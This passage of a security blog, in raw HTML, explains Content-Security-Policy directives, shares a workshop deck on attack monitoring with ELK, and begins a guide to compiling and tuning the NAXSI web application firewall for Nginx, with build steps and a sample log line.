<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">report-uri</span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://www.flipkart.com/appErrors</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Here is the explanation of the above policy:</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">default-src -</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> We default all origins as none, which forces us to specify all the source origins in all the ‘src’ directives.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src -</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We mention all the script sources we want to consume our JS files from, also all the analytics files and if any inline nonces.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">style-src -</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> All the CSS files needs to go in this directive.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">img-src -</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> All the image cdn sources need to be mentioned in this directive.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">connect-src-</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> All the Ajax(xhr) requests connections needs to be specified in this directive.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">report-uri-</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> This directive is important for debugging any violations which occur on production. A json blob is sent to the mentioned endpoint with appropriate error information.</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For more clarity on CSP directives we suggest to follow this </span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="http://content-security-policy.com/" style="color: #1155cc; text-decoration: none;">article</a><span style="color: #333333;">.</span></span></span><br />
<br />
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;">Firefox recently came up with a feature that allows us to test the secure implementation of CSP on any website. Just by opening the developer console and typing in "security csp" one can see the entire report.</span></span><br />
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"><br /></span></span></div>
<div style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div class="separator" style="clear: both; line-height: 1.56; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlV3S8ioX8-g6-FIrkEgXg9soCnizS6AJW0x_8cI0t4QPjUEJN_mXwtBS_GUgrmjWsBRMkKpzNTPux_jWGIbPEk1UEdEOjB4VN4-A-JB49m0OpW5TjWUJyo4f7tD4ARSV7dMkb6CTrDY/s1600/Screen+Shot+2016-05-09+at+12.17.47+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlV3S8ioX8-g6-FIrkEgXg9soCnizS6AJW0x_8cI0t4QPjUEJN_mXwtBS_GUgrmjWsBRMkKpzNTPux_jWGIbPEk1UEdEOjB4VN4-A-JB49m0OpW5TjWUJyo4f7tD4ARSV7dMkb6CTrDY/s320/Screen+Shot+2016-05-09+at+12.17.47+AM.png" width="449" /></a></div>
<div style="line-height: 1.56;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlV3S8ioX8-g6-FIrkEgXg9soCnizS6AJW0x_8cI0t4QPjUEJN_mXwtBS_GUgrmjWsBRMkKpzNTPux_jWGIbPEk1UEdEOjB4VN4-A-JB49m0OpW5TjWUJyo4f7tD4ARSV7dMkb6CTrDY/s1600/Screen+Shot+2016-05-09+at+12.17.47+AM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"></span></span>
</div>
<div style="line-height: 1.56; text-align: justify;">
<br /></div>
<div style="line-height: 1.56; text-align: justify;">
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"><span style="line-height: 1.56;">Some References</span></span></span></div>
<div style="line-height: 1.56; text-align: justify;">
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"><span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; line-height: 1.38; vertical-align: baseline;"><a href="https://benjaminhorn.io/code/content-security-policy-what-it-is-what-it-does-and-how-to-implement-it/">https://benjaminhorn.io/code/content-security-policy-what-it-is-what-it-does-and-how-to-implement-it/</a></span></span></span><br />
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small; white-space: pre-wrap;"><a href="https://securityheaders.io/" target="_blank">https://securityheaders.io</a></span></span></div>
<div style="line-height: 1.56;">
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; line-height: 1.38; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.html5rocks.com/en/tutorials/security/content-security-policy/">http://www.html5rocks.com/en/tutorials/security/content-security-policy/</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="text-align: justify;">
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><a href="http://bens.me.uk/2012/content-security-policy">http://bens.me.uk/2012/content-security-policy</a></span><br />
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.cspplayground.com/csp_validator">http://www.cspplayground.com/csp_validator</a></span><br />
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.sendsafely.com/using-content-security-policy-to-prevent-cross-site-scripting-xss">https://blog.sendsafely.com/using-content-security-policy-to-prevent-cross-site-scripting-xss</a></span><br /></div>
</div>
</div>
</div>Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-53850943288966700322016-05-08T01:27:00.001-07:002016-05-08T11:36:46.627-07:00Attack Monitoring Using ELK #outofband #ELK #osquery #filebeat #ElasticSearch<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif; text-align: left;">Me and Himanshu took a one day </span><span style="font-family: "verdana" , sans-serif; text-align: left;">Null Bachaav session</span><span style="font-family: "verdana" , sans-serif; text-align: left;"> yesterday on Attack monitoring. </span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;">It was a good turnout with a mix of people with very little knowledge of SIEM to someone who has been full time working on SIEM products. </span><span style="font-family: "verdana" , sans-serif;">We covered most of topics that we normally deliver in a 2 day workshop at NullCon. Sharing the presentation below. </span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/1CEuOnCXmMe6LM" style="border-width: 0px; border: 0px solid #ccc; margin-bottom: 2px; max-width: 100%;" width="595"> </iframe> </div>
<div style="margin-bottom: 5px;">
<br /></div>
<span style="font-family: "verdana" , sans-serif;">Tweet me @prajalkulkarni if you need help with any specific topics.</span><br />
<br />
<span style="font-family: "verdana" , sans-serif;">Some references:</span><br />
<div style="background-color: white; color: #222222;">
<span style="font-family: "courier new" , "courier" , monospace;">CloudFares #outofband DDOS protection :</span><a data-saferedirecturl="https://www.google.com/url?hl=en&q=https://www.youtube.com/watch?v%3DXiK4643YdOk&source=gmail&ust=1462810701154000&usg=AFQjCNHhC7kRB33oihR9f2QgBTC0OlsBjg" href="https://www.youtube.com/watch?v=XiK4643YdOk" style="color: #1155cc; font-family: 'courier new', courier, monospace;" target="_blank">https://www.youtube.com/<wbr></wbr>watch?v=XiK4643YdOk</a></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: "courier new" , "courier" , monospace;">Integrate Bro IDS with ELK : <a href="https://www.elastic.co/blog/bro-ids-elastic-stack">https://www.elastic.co/blog/bro-ids-elastic-stack</a></span></div>
<div style="background-color: white;">
<div style="color: #222222;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "verdana" , sans-serif;"><span style="font-family: "courier new" , "courier" , monospace;">Osquery in action:</span><span style="font-family: "courier new" , "courier" , monospace;"> </span></span><a data-saferedirecturl="https://www.google.com/url?hl=en&q=https://medium.com/airbnb-engineering/introducing-syslog-to-aws-kinesis-via-osquery-da4fc19de5ce%23.55om4ud0g&source=gmail&ust=1462810701154000&usg=AFQjCNFUM7F2iELwb9reoQdUwNsQ28-46A" href="https://medium.com/airbnb-engineering/introducing-syslog-to-aws-kinesis-via-osquery-da4fc19de5ce#.55om4ud0g" style="color: #1155cc; font-family: 'courier new', courier, monospace;" target="_blank">https://medium.com/<wbr></wbr>airbnb-engineering/<wbr></wbr>introducing-syslog-to-aws-<wbr></wbr>kinesis-via-osquery-<wbr></wbr>da4fc19de5ce#.55om4ud0g</a></span></div>
<span style="color: #222222; font-family: Courier New, Courier, monospace;"><a href="https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/fayaz">https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/fayaz</a></span></div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-8618343246088470442016-04-16T01:43:00.001-07:002016-05-08T09:04:32.333-07:00A cheap and effective Web App Firewall with continuos real time attack monitoring. #nginx #mod_security #naxsi #ElasticSearch #Kibana<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">I wanted to share one of my projects I worked on last year. We were trying to solve for “how to alert real time Web attacks” on our infrastructure. After a lot of brainstorming sessions we discarded the idea of having enterprise WAF solutions which are sold by many big players in the market. Most of the enterprise solutions work “inline” with your internet traffic and that chokes up considerable amount of your bandwidth.Having said that, I do not discourage anyone exploring these solutions. </span></span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"><br /></span>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">So we started exploring multiple open source products which are under active development. We chose NAXSI and Mod Security as our prime targets and started our research in how we can extract the best out these two.</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Since we were experimenting these on Nginx web server, we had to evaluate the one which gives us desirable output in terms of minimal performance impact and almost no false positives. We evaluated ModSecurity first and found it to be quite unstable, we observed multiple nginx worker processes dying on a regular intervals. However, these problems might have been solved with current commits to the project [</span><a href="https://github.com/SpiderLabs/ModSecurity/issues" style="line-height: 1.38; text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/SpiderLabs/ModSecurity/issues</span></a><span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">].</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">I found NAXSI to be more stable in terms of performance, but it requires a lot of tuning to cut down false/positives.</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span>
<div dir="ltr" style="line-height: 0.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-size: 14px;"><b>Stats</b><span style="font-size: 14px;">:</span></span></span></span><span style="font-family: "courier new"; line-height: 1.38; white-space: pre-wrap;">[This may vary depending upon what all modules nginx has been compiled]</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Nginx -</b> </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">65K qps</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">Max CPU Usage: 55%</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Nginx+Naxsi</b> </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">65K qps</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">Max CPU Usage: 68%</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">So, here on, I will be talking about how one can compile NAXSI with Nginx 1.4.4+ and fine tune it and have a continuous alert monitoring around the same.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace; font-size: small;">What is NAXSI?:</span></span></h3>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">NAXSI means Nginx Anti Xss & Sql Injection.Its a web application firewall (WAF) which comes as a nginx module which needs to be compiled from source, it is also available as a package for many UNIX-like platforms. This module, by default, reads a small subset of simple rules (naxsi_core.rules) containing 99% of known patterns involved in websites vulnerabilities. For example, '<', '|' or 'drop' are not supposed to be part of a URI.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Naxsi is different from other WAF solutions, since it totally relies on a whitelist approach and not a signature based approached which is a lot more slower and resource consuming.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">So with Naxsi in place we were able to have decent picture of which all IP addresses were attacking us and how we can stop them at our edge network.</span><br />
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">To start with let's look at a simple architecture of our Web application Firewall.</span></span></div>
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif; margin-left: 1em; margin-right: 1em;"><img alt="Screen Shot 2016-04-15 at 8.28.18 PM.png" height="436" src="https://lh4.googleusercontent.com/qN69oFRRC2D8m6MDD7aCD3ESLCwM2XDITkReenbMPNyjSsbacCPJcxKQQuPgW9duBA4TG90g3V1I3QqzWzYQJzWA3TxEtz4QEXf1XART6G6ilfuccSWd-YrjR6s1cYa4PN9JYYjp" style="border: none; transform: rotate(0rad);" width="640" /></span></div>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Here are simple steps to compile NAXSI from source :</b></span></span></div>
<ol style="text-align: left;">
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Select the nginx tar file here(http://nginx.org/download/)</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Untar it in the /opt folder</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">wget the newest naxsi source code (https://github.com/nbs-system/naxsi) in /opt folder</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">install libpcre3-dev </span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">cd nginx-1.4.4 and start compiling</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">sudo ./configure --pid-path=/var/run/nginx.pid --lock-path=/var/lock/nginx.lock --with-http_ssl_module --with-debug --http-log-path=/var/log/nginx/access.log --conf-path=/etc/nginx/fk_nginx.conf --with-http_stub_status_module --user=nginx --error-log-path=/var/log/nginx/error.log --prefix=/usr/local/nginx_new --sbin-path=/usr/sbin/nginx --with-http_realip_module --http-client-body-temp-path=/var/lib/nginx/body --http-proxy-temp-path=/var/lib/nginx/proxy --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --add-module=../naxsi/naxsi_src/ </span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">sudo make && sudo make install </span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Now copy the naxsi main ruleset file to /etc/nginx → sudo cp naxsi_core.rules /etc/nginx/naxsi_core.rules</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">sudo nano /etc/nginx/nginx.conf</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38; text-indent: 36pt;">[add the /etc/nginx/naxsi_core.rules in include directive] </span></li>
</ol>
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> sudo nano</span><span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">/etc/nginx/nginx.conf</span><br />
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> </span><span style="font-size: xx-small;"><span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> http {</span></span><br />
<ol style="text-align: left;">
</ol>
<span style="font-size: xx-small;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 19.32px; white-space: pre-wrap;"><br /></span></span><span style="font-family: "courier new" , "courier" , monospace; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="font-family: "courier new" , "courier" , monospace; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"> include /etc/nginx/naxsi_core.rules;</span></span><br />
<span style="font-size: xx-small;"><span style="font-family: "courier new" , "courier" , monospace; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="font-family: "courier new" , "courier" , monospace; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"> }</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; white-space: pre-wrap;">11. Create the Whitelist file my_naxsi.rules</span><br />
<span style="line-height: 1.38; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Few links for whitelist creation:</b></span></span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/prajal/nxutil" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/prajal/nxutil</span></a></div>
<span id="docs-internal-guid-c144d0cf-1e4b-1251-6392-b4956f85f9b3"><a href="https://github.com/nbs-system/naxsi/wiki/whitelists" style="text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/nbs-system/naxsi/wiki/whitelists</span></a></span><br />
<span style="color: black; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>For a simple apt-get installation follow :</b> </span></span><a href="https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-naxsi-on-ubuntu-14-04" style="font-family: 'courier new', courier, monospace; text-decoration: none; white-space: pre-wrap;">https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-naxsi-on-ubuntu-14-04</a><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">We used NAXSI in learning mode to avoid as much noise as possible. For creating the ruleset I recommend running it in production in Learning mode and gathering a significant amount of valid traffic, and post running the </span><span style="line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">nxutil</span></span><span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> script to generate the whitelist that is specific to your prod environment.</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">More details on </span><span style="color: black; font-family: "courier new" , "courier" , monospace; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">nxutils</span><span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"> can be found here: </span><a href="https://github.com/prajal/nxutil" style="text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/prajal/nxutil</span></a><span style="color: black; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"></span></span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> </span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">NAXSI write all its attack logs in nginx error location:</span><br />
<span style="color: black; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"> /var/log/nginx/error.log</span></span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><b>Example Error logs:</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">2015/03/27 12:00:18 [error] 22909#0: *13840757 NAXSI_FMT: ip=ATTACKIP&server=www.yourcompany.com&uri=/&learning=1&vers=0.54&total_processed=22184&total_blocked=20&block=1&zone0=BODY&id0=16&var_name0=, client: ATTACKIP, server: www.youcompany.com, request: "POST /?t=12:00:17%20PM HTTP/1.1", host: "A.B.C.D"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
